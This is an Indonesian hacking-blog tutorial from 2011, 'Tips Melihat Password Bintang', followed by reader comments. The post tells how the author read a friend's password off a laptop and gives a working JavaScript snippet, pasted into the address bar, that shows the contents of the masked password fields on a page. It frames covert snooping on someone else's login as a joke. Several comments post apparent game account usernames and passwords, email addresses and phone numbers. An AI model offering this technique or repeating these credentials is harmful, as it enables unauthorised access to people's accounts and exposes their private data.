Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Tips Melihat Password Bintang

22 March 2011
Penulis:   · Kategori Artikel: Tutorial

BINUS HACKER Binus Hacker Is Not Criminal Banner

BINUS HACKER

BINUS HACKER


 

Bosen gak ada kegiatan, kebetulan ada temen login di Laptop untuk Browsing.

Pas kebetulan dia pergi sambil ninggalin password bintangnya & boom saya tau deh passwordnya. Hehehe :)

Berikut saya kasi contohnya:

1. Ada seseorang yang login ke website untuk melakukan check email, login ke facebook & sebagainya. Maka akan tampak seperti contoh dibawah:

Terlihat disana bahwa Address Barnya masih: https://login.yahoo.com/config/login_verify2?&.src=ym & kita masih belum tahu apa sih passwordnya (Password Berbentuk Bintang: ***************). Penasaran kan?

2. Kita lanjutkan dengan membuat kode berikut:

javascript:(/* BinusHacker Tutorial By UtuH */ function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwordnya adalah:\n\n" + s); else alert("Tidak ada password bintang disini.");})();

Kita copy script diatas ke ADDRESS BAR, sehingga di ADDRESS BAR menjadi seperti gambar berikut:

BOOOOOMMMMM, dari informasi di atas kelihatan kan bahwa:

USERNAME: BINUSHACKER

PASSWORD: HACKERINDONESIA

Selamat, anda telah dapat melihat PASSWORD yang tersembunyi dalam BINTANG-BINTANG!

Enjoy & Eat It.. :)

Silakan berkunjung & jalan-jalan ke website saya di SINI

Silakan Follow Twitter Saya:
Follow Utuh Wibowo Twiiter

BINUS HACKER Binus Hacker Chat and Forum

Komentar

474 Komentar Untuk “Tips Melihat Password Bintang
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Lukman pada 9 June 2013 2:46 am

    gw gx ngerti gmna caranya

  2. rudi pada 10 June 2013 1:49 am

    kaya apa caranya supaya bisa melihat passwor lost saga

  3. fajar pada 10 June 2013 6:28 am

    bagi char pb gm kk plizzzzzzzzz

  4. ilham pada 14 June 2013 6:44 pm

    saya mau char yg ada chas nya

  5. skate pada 19 June 2013 10:45 pm

    (:

  6. davit pada 20 June 2013 4:11 am

    nil id:chelgratia17 pass:che123

  7. rian pada 24 June 2013 7:42 pm

    hacker :*

  8. tito pada 25 June 2013 6:43 pm

    saya mau char saya yang n1p0n kembali lagi caranya gimana.. ??
    tanpa hint aswer ??

  9. (*:GraNat:*) pada 26 June 2013 7:25 pm

    Gmna Cara ngambil Pas Poin Blank
    Yg lupa pas ea”” tapi aq tau nama Hint ea
    Kloq email ea Udah hilng D Hp
    Tlng Ksih tau Cara ea Untuk ngambil Pas Cm aq
    Kirim Ke Email:Mikhsan281@yahoo.com

  10. fadel pada 28 June 2013 8:09 pm

    fadel

  11. fahri part II pada 3 July 2013 6:22 am

    terima kasih banyak kk mau memberi char pb nya

  12. The ForWont pada 3 July 2013 9:59 pm

    mantab bang udah gwa coba berhasil wkwkwkwkwkwk

  13. alki pada 4 August 2013 12:31 am

    bang gm bagi aku mayor 1 aja boleh yg penting bisa

  14. Ricky pada 4 August 2013 1:19 am

    KK ini beneran apa kaga sih aku jadi bingung dech ciusssssssssssssssssssssssss

  15. pipin pada 4 August 2013 5:15 am

    iya ta]

  16. ricky pada 5 August 2013 5:09 pm

    Kk minta char Pb pangkat bintang 5 yg ada cash nya plizzzzzzzzzzzzzzzzzz

  17. ricky pada 5 August 2013 5:11 pm

    Kk minta char Pb pangkat bintang 5 yg ada cash nya plizzzzzzzzzzzzzzzzzz kalau boleh Sama bisa kirimin ke email aku aja kk

  18. bagas pradana pada 6 August 2013 4:03 am

    raimu lek ra bok ksh

  19. riski pada 6 August 2013 7:39 am

    Gm saya mau pangkat diamon
    saya cinta poinblank

  20. oki.s pada 6 August 2013 7:12 pm

    KK ini beneran apa kaga sih aku jadi bingung dech ciusssssssssssssssssssssssss

  21. ahd padli pada 9 August 2013 5:08 pm

    bagus

  22. ahd padli pada 9 August 2013 5:09 pm

    cantik

  23. fidel pada 10 August 2013 8:01 pm

    id pas:!!!!!!!!!!

  24. toni pada 10 August 2013 11:06 pm

    terima kasih

  25. Dick pada 12 August 2013 7:26 pm

    Abang & KK …ada yang pernah Liat g Char PB yg nama’a”””””DMiTH_IOrthodox”””klo pernah hub:089606856431…..Tankzz..ntar kasih PB LT 1

  26. yuan pada 13 August 2013 12:29 am

    kk beneran nie kan

  27. Indra pada 15 August 2013 8:34 pm

    ko gua ga bisa bisa yah.

  28. nanda pada 19 August 2013 2:26 am

    gan mntk char bintang 1tlong ya gan krm kan no nh ya char nya ma hint nya skali 085765224341

  29. panha pada 20 August 2013 10:50 pm

    panha pembohong katanya ada pass bintang disini

  30. ocan pada 25 August 2013 7:39 am

    gud bang aku bru tau cara hecker

  31. ogi pada 28 August 2013 8:14 pm

    +56396262

  32. dedenandrianto pada 30 August 2013 5:25 am

    gan bagi car gm di paswwot plizzzzzzzzz?????

  33. Rama pada 4 September 2013 4:07 am

    kk gm aku minta id pw pangkat terserah yang penting senjata permanen fullcash title full ok

  34. Rama pada 4 September 2013 4:10 am

    ini bener gak sih bingun aku mas GM kalok betul kasih aku id pw senjata permanen full cash full title…….??
    okokokokokokokokok salam Rama ID:ipulsainal PW: teko605 di coba ya

  35. bagus pada 27 September 2013 11:16 pm

    siapa yang mau pb major nih tah kasih id=zainurimza pass=12zainuri89

  36. menek pada 5 October 2013 10:59 pm

    susah gn gimana

  37. menek pada 5 October 2013 10:59 pm

    gimana sih

  38. menek pada 5 October 2013 11:00 pm

    sad plizzzzzz ajarin gimana caranya dapatin bintang tolong

  39. BINUSHACKER pada 24 October 2013 11:56 pm

    ID_ GAMPOH66_ PASSWORD_FXTII77

  40. gianesta pada 26 October 2013 1:02 am

    kenapa kamu baru pulang aku dah cari cari gak ketemu

  41. eza pada 26 October 2013 1:33 am

    sebaik nya kau tidak boleh main lama lama lagi you an desten

  42. sinaga pada 31 October 2013 11:52 pm

    aidi., pepekgm paspot .,jadipenipu12

  43. hibbat pada 4 November 2013 1:28 am

    ini apa beneran klau bohong gue laporin polisi lhooo…….?

  44. ardiansyah pada 11 November 2013 11:01 pm

    apa apan nih gk bisa di jajal

  45. dani syahputara partII pada 13 November 2013 2:26 am

    111

  46. mizan pada 16 November 2013 2:14 am

    aku mau mayor asli titel penuh plizzzzzzzzzzzzz

  47. Yuda lesmana pada 21 November 2013 9:23 pm

    gimana sih

  48. 1234zendut pada 22 November 2013 10:08 pm

    Cheat Cash 100000000000000 Mau Semua Bagus Lho Seru Senjata Full

  49. jhggng pada 28 November 2013 6:23 am

    gm aku minta char pb ama ls bintang 2 aja

  50. jhggng pada 28 November 2013 6:24 am

    boleh ga
    sia gm boleh ga njjb

Silahkan Berikan Tanggapan Anda...